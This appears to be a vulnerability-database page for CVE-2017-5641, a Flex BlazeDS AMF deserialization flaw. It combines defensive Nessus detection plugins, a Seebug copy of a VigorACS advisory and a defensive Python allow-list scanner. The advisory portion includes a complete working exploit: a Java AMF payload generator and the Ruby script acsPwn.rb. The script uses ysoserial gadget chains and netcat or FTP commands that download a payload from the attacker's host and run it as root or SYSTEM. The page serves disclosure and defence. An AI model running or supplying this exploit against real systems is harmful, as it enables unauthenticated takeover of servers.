CVE-2017-5641 - Deserialization of Untrusted Data vulnerability in multiple products
Summary
Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.
Vulnerable Configurations
Part | Description | Count
---|---|---
Application | | 1
Application | | 1
Nessus
NASL family | Misc.
NASL id | VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL
description | The version of VMware vCenter Server Appliance installed on the remote host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.
last seen | 2020-06-01
modified | 2020-06-02
plugin id | 99474
published | 2017-04-19
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source | https://www.tenable.com/plugins/nessus/99474
title | VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)
code |

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99474);
  script_version("1.6");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-5641");
  script_bugtraq_id(97383);
  script_xref(name:"VMSA", value:"2017-0007");
  script_xref(name:"CERT", value:"307983");

  script_name(english:"VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)");
  script_summary(english:"Checks the version of VMware vCenter Server Appliance.");

  script_set_attribute(attribute:"synopsis", value:
"A virtualization appliance installed on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of VMware vCenter Server Appliance installed on the remote
host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is,
therefore, affected by a flaw in FlexBlazeDS when processing AMF3
messages due to allowing the instantiation of arbitrary classes when
deserializing objects. An unauthenticated, remote attacker can exploit
this, by sending a specially crafted Java object, to execute arbitrary
code.");
  script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0007.html");
  # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1bb48b81");
  # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f0a01429");
  script_set_attribute(attribute:"see_also", value:"https://codewhitesec.blogspot.com/2017/04/amf.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to VMware vCenter Server Appliance 6.0 Update 3b / 6.5 Update c
or later. Alternatively, apply the vendor-supplied workaround.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5641");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/04");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/19");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:vcenter_server_appliance");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/VMware vCenter Server Appliance/Version", "Host/VMware vCenter Server Appliance/Build");
  script_require_ports("Services/ssh", 22);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

appname = 'VMware vCenter Server Appliance';
version = get_kb_item_or_exit("Host/"+appname+"/Version");
build   = get_kb_item_or_exit("Host/"+appname+"/Build");
port = 0;
fixversion_str = NULL;

if (
  version !~ "^6\.0($|[^0-9])" &&
  version !~ "^6\.5($|[^0-9])"
) audit(AUDIT_NOT_INST, appname + " 6.0.x / 6.5.x");

if (version =~ "^6\.0($|[^0-9])")
{
  fixed_main_ver = "6.0.0";
  fixed_build = 5326079;
  if (int(build) < fixed_build)
    fixversion_str = fixed_main_ver + ' build-'+fixed_build;
}
else if (version =~ "^6\.5($|[^0-9])")
{
  fixed_main_ver = "6.5.0";
  fixed_build = 5318112;
  if (int(build) < fixed_build)
    fixversion_str = fixed_main_ver + ' build-'+fixed_build;
}

if (isnull(fixversion_str))
  audit(AUDIT_INST_VER_NOT_VULN, appname, version, build);

report = report_items_str(
  report_items:make_array(
    "Installed version", version + ' build-' + build,
    "Fixed version", fixed_main_ver + ' build-' + fixed_build
  ),
  ordered_fields:make_list("Installed version", "Fixed version")
);
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
```
NASL family | Misc.
NASL id | VMWARE_VCENTER_VMSA-2017-0007.NASL
description | The version of VMware vCenter Server installed on the remote host is 6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.
last seen | 2020-06-01
modified | 2020-06-02
plugin id | 99475
published | 2017-04-19
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source | https://www.tenable.com/plugins/nessus/99475
title | VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)
code |

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99475);
  script_version("1.7");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-5641");
  script_bugtraq_id(97383);
  script_xref(name:"VMSA", value:"2017-0007");
  script_xref(name:"CERT", value:"307983");

  script_name(english:"VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)");
  script_summary(english:"Checks the version of VMware vCenter.");

  script_set_attribute(attribute:"synopsis", value:
"A virtualization management application installed on the remote host is
affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of VMware vCenter Server installed on the remote host is
6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected
by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing
the instantiation of arbitrary classes when deserializing objects. An
unauthenticated, remote attacker can exploit this, by sending a
specially crafted Java object, to execute arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0007.html");
  # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1bb48b81");
  # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f0a01429");
  script_set_attribute(attribute:"see_also", value:"https://codewhitesec.blogspot.com/2017/04/amf.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to VMware vCenter Server version 6.0u3b (6.0.0 build-5326177) /
6.0u3b on Windows (6.0.0 build-5318198) / 6.5.0c (6.5.0 build-5318112)
or later. Alternatively, apply the vendor-supplied workaround.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5641");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/04");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:vcenter_server");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("find_service.nasl", "os_fingerprint.nasl", "vmware_vcenter_detect.nbin");
  script_require_keys("Host/VMware/vCenter", "Host/VMware/version", "Host/VMware/release");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

port    = get_kb_item_or_exit("Host/VMware/vCenter");
version = get_kb_item_or_exit("Host/VMware/version");
release = get_kb_item_or_exit("Host/VMware/release");

# Extract and verify the build number
build = ereg_replace(
  pattern:'^VMware vCenter Server [0-9\\.]+ build-([0-9]+)$',
  string:release,
  replace:"\1"
);
if (empty_or_null(build) || build !~ '^[0-9]+$')
  audit(AUDIT_UNKNOWN_BUILD, "VMware vCenter Server");
build = int(build);

release = release - 'VMware vCenter Server ';
fixversion = NULL;

os = get_kb_item("Host/OS");

# Check version and build numbers
if (version =~ "^VMware vCenter 6\.0($|[^0-9])")
{
  # If not paranoid, let's check to see if OS is populated
  if (report_paranoia < 2 && empty_or_null(os))
    exit(0, "Can not determine version 6.0 fix build because Host/OS KB item is not set.");

  # vCenter Server 6.0 Update 3b on Windows | 13 APR 2017 | ISO Build 5318198
  # Windows
  if ("windows" >< tolower(os))
  {
    fixbuild = 5318198;
    if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;
  }
  # vCenter Server 6.0 Update 3b on vCenter Server Appliance Build 5318203
  # Standard
  else
  {
    fixbuild = 5318203;
    if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;
  }
}
else if (version =~ "^VMware vCenter 6\.5($|[^0-9])")
{
  # vCenter Server 6.5.0c | 13 APRIL 2017 | ISO Build 5318112
  # Standard
  fixbuild = 5318112;
  if (build < fixbuild) fixversion = '6.5.0 build-'+fixbuild;
}

if (isnull(fixversion))
  audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);

report = report_items_str(
  report_items:make_array(
    "Installed version", release,
    "Fixed version", fixversion
  ),
  ordered_fields:make_list("Installed version", "Fixed version")
);
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
```
Packetstorm
data source | https://packetstormsecurity.com/files/download/151535/cisco-ise-rce.txt
id | PACKETSTORM:151535
last seen | 2019-02-05
published | 2019-02-05
reporter | Pedro Ribeiro
source | https://packetstormsecurity.com/files/151535/Cisco-ISE-2.4.0-XSS-Remote-Code-Execution.html
title | Cisco ISE 2.4.0 XSS / Remote Code Execution
Seebug
id | SSV:97242
bulletinFamily | exploit
last seen | 2018-06-10
modified | 2018-04-25
published | 2018-04-25
reporter | Knownsec
title | Vigor ACS Unsafe Flex AMF Java Object Deserialization (CVE-2017-5641)
description |

### Vulnerability Summary

A vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code.

VigorACS 2 “is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer’s DrayTek devices.”

### Credit

An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

### Vendor Response

“We’ll release the new version 2.2.2 to resolve this problem and inform the user about the CVE ID and reporter. The release note will be updated on Wednesday (Apr 4, 2018). Kindly let me know if you have further question, thank you!”

### Vulnerability Details

VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2].

One of the endpoints exposed by VigorACS, at /ACSServer/messagebroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls.

This advisory shows that VigorACS uses a Flex version that is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF.

### Technical Details

By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes:

```
...Unsupported AMF version XXXXX...
```

While in the server logs, a stack trace will be produced that includes the following:

```
flex.messaging.io.amf.AmfMessageDeserializer.readMessage
...
flex.messaging.endpoints.amf.SerializationFilter.invoke
...
...
```

A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description:

“Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.”

Further reading in [4], [5] and [6] led to a proof of concept (Appendix A) that showed both on the server logs and in the HTTP responses that the deserialization could be exploited to achieve code execution.

A fully working exploit has been released with this advisory that works in the following way:

a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [5] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker
b) receives the JRMP connection with ysoserial’s JRMP listener [7]
c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server
d) executes code as root / SYSTEM

The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [7], or alternatively a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained – see [8]).

Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [5], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability.

### Appendix A

```
import flex.messaging.io.amf.MessageBody;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.AmfMessageSerializer;

import java.io.*;

public class ACSFlex {
    public static void main(String[] args) {
        Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));

        // serialize object to AMF message
        try {
            byte[] amf = new byte[0];
            amf = serialize((unicastRef));
            DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));
            os.write(amf);
            System.out.println("Done, payload written to " + args[2]);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static Object generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    public static byte[] serialize(Object data) throws IOException {
        MessageBody body = new MessageBody();
        body.setData(data);

        ActionMessage message = new ActionMessage();
        message.addBody(body);

        ByteArrayOutputStream out = new ByteArrayOutputStream();
        AmfMessageSerializer serializer = new AmfMessageSerializer();
        serializer.initialize(SerializationContext.getSerializationContext(), out, null);
        serializer.writeMessage(message);

        return out.toByteArray();
    }
}
```

acsPwn.rb

```
#!/usr/bin/ruby
=begin
=== acsFlex.jar:
import flex.messaging.io.amf.MessageBody;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.AmfMessageSerializer;

import java.io.*;

public class ACSFlex {
    public static void main(String[] args) {
        Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));

        // serialize object to AMF message
        try {
            byte[] amf = new byte[0];
            amf = serialize((unicastRef));
            DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));
            os.write(amf);
            System.out.println("Done, payload written to " + args[2]);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static Object generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    public static byte[] serialize(Object data) throws IOException {
        MessageBody body = new MessageBody();
        body.setData(data);

        ActionMessage message = new ActionMessage();
        message.addBody(body);

        ByteArrayOutputStream out = new ByteArrayOutputStream();
        AmfMessageSerializer serializer = new AmfMessageSerializer();
        serializer.initialize(SerializationContext.getSerializationContext(), out, null);
        serializer.writeMessage(message);

        return out.toByteArray();
    }
}

=== ysoserial.jar:
- Use the multiarg branch of https://github.com/frohoff/ysoserial
- Or patch ysoserial with CommonsCollections5Chained and CommonsCollections6Chain from https://github.com/frohoff/ysoserial/issues/71
===
=end

require 'ftpd'
require 'tmpdir'
require 'net/http'
require 'uri'

class String
  def black;          "\e[30m#{self}\e[0m" end
  def red;            "\e[31m#{self}\e[0m" end
  def green;          "\e[32m#{self}\e[0m" end
  def brown;          "\e[33m#{self}\e[0m" end
  def blue;           "\e[34m#{self}\e[0m" end
  def magenta;        "\e[35m#{self}\e[0m" end
  def cyan;           "\e[36m#{self}\e[0m" end
  def gray;           "\e[37m#{self}\e[0m" end
  def bg_black;       "\e[40m#{self}\e[0m" end
  def bg_red;         "\e[41m#{self}\e[0m" end
  def bg_green;       "\e[42m#{self}\e[0m" end
  def bg_brown;       "\e[43m#{self}\e[0m" end
  def bg_blue;        "\e[44m#{self}\e[0m" end
  def bg_magenta;     "\e[45m#{self}\e[0m" end
  def bg_cyan;        "\e[46m#{self}\e[0m" end
  def bg_gray;        "\e[47m#{self}\e[0m" end
  def bold;           "\e[1m#{self}\e[22m" end
  def italic;         "\e[3m#{self}\e[23m" end
  def underline;      "\e[4m#{self}\e[24m" end
  def blink;          "\e[5m#{self}\e[25m" end
  def reverse_color;  "\e[7m#{self}\e[27m" end
end

# FTP server (Windows)
class Driver
  def initialize(temp_dir)
    @temp_dir = temp_dir
  end

  def authenticate(user, password)
    # actually the client hasn't downloaded it yet, just logged in, but whatever
    puts '[+] Payload has been downloaded, wait for execution!'.green.bold
    true
  end

  def file_system(user)
    Ftpd::DiskFileSystem.new(@temp_dir)
  end
end

def ftp_start (temp_dir, lhost, port)
  driver = Driver.new(temp_dir)
  server = Ftpd::FtpServer.new(driver)
  server.interface = lhost
  server.port = port
  server.start
end

def tcp_start (payload, port)
  pl = File.binread(payload)
  server = TCPServer.new port
  loop do
    Thread.start(server.accept) do |client|
      client.write(pl)
      client.close
      puts "[+] Payload has been downloaded, wait for execution!".green.bold
    end
  end
end

puts ""
puts "Draytek VigorACS 2 unauthenticated remote code execution (unsafe Java AMF deserialization)".cyan.bold
puts "CVE-TODO".cyan.bold
puts "Tested on version 2.2.1 for Windows and Linux, earlier versions are likely vulnerable".cyan.bold
puts "By Pedro Ribeiro ([email protected]) / Agile Information Security".blue.bold
puts ""

if (ARGV.length < 5 || (ARGV[3] != "Linux" && ARGV[3] != "Windows") || !File.file?(ARGV[4]))
  puts "Usage: ./acsPwn.rb <rhost> <rport> <lhost> <Windows|Linux> <payload_path> [ssl]".bold
  puts " rhost:\t\t\tDraytek Vigor ACS server host"
  puts " rport:\t\t\tDraytek Vigor ACS server port"
  puts " lhost:\t\t\tyour IP address"
  puts " Windows|Linux:\t\ttarget type"
  puts " payload_path:\t\tPath to the payload that is going to be executed in the Vigor server"
  puts " ssl:\t\t\tConnects to Vigor server using SSL (by default uses plain HTTP)"
  puts ""
  puts "NOTES:\tThis exploit requires the ftpd gem installed and the java executable in the PATH."
  puts "\tThe included ysoserial.jar (patched for multiarg) and the included acsFlex.jar must be in the current directory."
  puts "\tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target."
  puts ""
  exit(-1)
end

# we can use ysoserial's CommonsCollections5 or CommonsCollections6 exploit chain
YSOSERIAL = "ysoserial-patched.jar ysoserial.exploit.JRMPListener JRMP_PORT CommonsCollections6Chained "
WINDOWS_CMD = %{'cmd.exe /c @echo open SERVER PORT>script.txt&@echo binary>>script.txt&@echo get /PAYLOAD>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start PAYLOAD'}
LINUX_CMD = %{\'nc -w 2 SERVER PORT > /tmp/PAYLOAD; chmod +x /tmp/PAYLOAD; /tmp/PAYLOAD\'}

rhost = ARGV[0]
rport = ARGV[1]
lhost = ARGV[2].dup.force_encoding('ASCII')
os = ARGV[3]
payload_path = ARGV[4]
payload_name = File.basename(ARGV[4])

if ARGV.length > 5 && ARGV[5] == 'ssl'
  ssl = true
else
  ssl = false
end

Dir.mktmpdir { |temp_dir|
  server_port = rand(10000..65535)
  FileUtils.cp(payload_path, temp_dir)
  puts "[+] Picked port #{server_port} for the #{(os == 'Windows' ? 'FTP' : 'TCP')} server".cyan.bold

  # step 1: start the TCP or FTP server
  if os == 'Windows'
    ftp_start(temp_dir, lhost, server_port)
  else
    t = Thread.new{tcp_start(payload_path, server_port)}
  end

  # step 2: create the AMF payload
  puts "[+] Creating AMF payload...".green.bold
  jrmp_port = rand(10000..65535)
  amf_file = temp_dir + "/payload.ser"
  system("java -jar acsFlex.jar #{lhost} #{jrmp_port} #{amf_file}")
  amf_payload = File.binread(amf_file)

  # step 3: start the ysoserial JRMP listener
  puts "[+] Picked port #{jrmp_port} for the JRMP server".cyan.bold
  # build the command line argument that will be executed by the server
  cmd = (os == 'Windows' ? "java " : "java -Dysoserial.prefix=\'/bin/sh -c\' ")
  cmd += "-cp #{YSOSERIAL.gsub('JRMP_PORT', jrmp_port.to_s)}"
  cmd_final = (os == 'Windows' ? WINDOWS_CMD : LINUX_CMD).gsub("SERVER", lhost).gsub("PORT", server_port.to_s).gsub("PAYLOAD", payload_name)
  puts "[+] Sending command #{cmd_final}".green.bold
  jrmp_pid = spawn((cmd + cmd_final))
  sleep 5
  Process.detach(jrmp_pid)

  # step 4: fire the payload!
  uri = URI.parse("http#{ssl ? 's': ''}://#{rhost}:#{rport}")
  Net::HTTP.start(uri.host, uri.port, (ssl ? {:use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE } : {})) do |http|
    http.post('/ACSServer/messagebroker/amf', amf_payload)
  end

  puts "[+] AMF payload sent, waiting 15 seconds for payload download...".green.bold
  sleep 15
  Process.kill("HUP", jrmp_pid)
  if t
    t.terminate
  end
  puts "[*] Payload should have executed by now, exiting!".bold
}

exit 0
```

id | SSV:92914
bulletinFamily | exploit
last seen | 2017-11-19
modified | 2017-04-06
published | 2017-04-06
reporter | Root
title | AMF3 Java implementations Improper Control of Dynamically-Managed Code Resources
description |

Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html

Some Java implementations of AMF3 deserializers may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.

The reporter has identified the following products and versions as being affected, and CVE IDs have been assigned as follows:

- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3202
- Flex BlazeDS, versions 4.6.0.23207 and 4.7.2 - CVE-2017-5641
- GraniteDS, version 3.1.1.GA - CVE-2017-3200

Products using these libraries may also be impacted.
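The defensive counterpart to the behaviour described in the two Seebug entries is to decide which classes may be instantiated before the deserializer runs. As an added example (not code from Seebug, from BlazeDS, or from the advisory above), the following Python walks an AMF3 message body, following the same string and traits reference tables a real decoder keeps, and records every class name the deserializer would instantiate, so the names can be checked against an allow-list before any constructor or Java Beans setter is called; this is the kind of type restriction the summary says BlazeDS 4.7.2 and earlier lacked by default. The class `com.example.Ping`, the allow-list prefixes and both sample bodies are constructed for this example; the second sample only borrows the class name from Appendix A and carries dummy bytes in place of externalizable data.

```python
AMF3_INT, AMF3_DOUBLE, AMF3_STRING, AMF3_DATE, AMF3_ARRAY, AMF3_OBJECT = 4, 5, 6, 8, 9, 10
AMF0_AVMPLUS = 0x11  # AMF0 marker that switches a message body to AMF3 encoding

class StopScan(Exception): pass  # an externalizable object makes the rest of the body opaque

class Amf3Scanner:
    def __init__(self, data):
        self.data, self.pos = data, 0
        self.strings, self.traits, self.class_names = [], [], []  # reference tables, result

    def u8(self):
        self.pos += 1
        return self.data[self.pos - 1]

    def u29(self):  # variable-length int: 7 bits in each of the first three bytes, 8 in the fourth
        v = 0
        for _ in range(3):
            b = self.u8()
            if not b & 0x80:
                return (v << 7) | b
            v = (v << 7) | (b & 0x7F)
        return (v << 8) | self.u8()

    def string(self):
        ref = self.u29()
        if not ref & 1:
            return self.strings[ref >> 1]  # back-reference to an earlier string
        s = self.data[self.pos:self.pos + (ref >> 1)].decode('utf-8')
        self.pos += ref >> 1
        if s:
            self.strings.append(s)  # the empty string never enters the table
        return s

    def value(self):
        m = self.u8()  # undefined, null, false and true carry no payload
        if m == AMF3_INT:
            self.u29()
        elif m == AMF3_DOUBLE or (m == AMF3_DATE and self.u29() & 1):
            self.pos += 8
        elif m == AMF3_STRING:
            self.string()
        elif m == AMF3_ARRAY:
            ref = self.u29()
            if ref & 1:  # inline; a clear low bit would be an object reference
                while self.string():  # associative part, terminated by ''
                    self.value()
                for _ in range(ref >> 1):  # dense part
                    self.value()
        elif m == AMF3_OBJECT:
            self.obj()

    def obj(self):
        ref = self.u29()
        if not ref & 1:
            return  # reference to an earlier object
        if not ref & 2:
            members, dynamic = self.traits[ref >> 2]  # reference to earlier traits
        else:
            self.class_names.append(self.string())  # the class the server would create
            if ref & 4:
                raise StopScan  # externalizable: readExternal() consumes class-specific bytes
            dynamic, members = bool(ref & 8), [self.string() for _ in range(ref >> 4)]
            self.traits.append((members, dynamic))
        for _ in members:
            self.value()
        while dynamic and self.string():  # dynamic members, terminated by ''
            self.value()

def disallowed_classes(body, allow_prefixes):
    """Class names an allow-list would reject; run on the message body before deserializing."""
    if body[:1] != bytes([AMF0_AVMPLUS]):
        return []  # plain AMF0 body, not covered here
    scanner = Amf3Scanner(body[1:])
    try:
        scanner.value()
    except StopScan:
        pass  # the offending externalizable class name is already recorded
    return [n for n in scanner.class_names if n and not n.startswith(tuple(allow_prefixes))]

# Constructed sample bodies (hand-encoded AMF3 behind the avmplus marker): a sealed object of the
# hypothetical class com.example.Ping with member msg="hi", and an externalizable object that only
# borrows the class name from Appendix A, followed by dummy bytes in place of its real data.
BENIGN = bytes([AMF0_AVMPLUS, AMF3_OBJECT, 0x13, 0x21]) + b'com.example.Ping' + bytes([0x07]) + b'msg' + bytes([AMF3_STRING, 0x05]) + b'hi'
SUSPECT = bytes([AMF0_AVMPLUS, AMF3_OBJECT, 0x07, 0x33]) + b'sun.rmi.server.UnicastRef' + bytes(8)
ALLOW = ('flex.messaging.', 'com.example.')  # constructed allow-list, not a BlazeDS default
```

The walk stops at the first externalizable object because its `readExternal()` data is class-specific, which is exactly why the class name has to be judged before that call is ever made.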
References
- http://mail-archives.apache.org/mod_mbox/flex-dev/201703.mbox/%3C6B86C8D0-6E36-48F5-AC81-4AB3978F6746%40c-ware.de%3E
- http://www.securityfocus.com/bid/97383
- http://www.securitytracker.com/id/1038273
- https://issues.apache.org/jira/browse/FLEX-35290
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03823en_us
- https://www.kb.cert.org/vuls/id/307983
- https://www.zerodayinitiative.com/advisories/ZDI-22-506/
- https://www.zerodayinitiative.com/advisories/ZDI-22-507/